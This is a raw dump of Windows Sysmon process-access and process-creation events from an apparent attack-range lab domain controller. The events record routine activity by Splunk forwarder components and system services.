Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9056-6005-1701-00000000A301}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9056-6005-1701-00000000A301}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-9056-6005-1701-00000000A301}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.347{59A5CD1D-9057-6005-1801-00000000A301}42204392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9057-6005-1801-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9057-6005-1801-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9057-6005-1801-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-9057-6005-1801-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 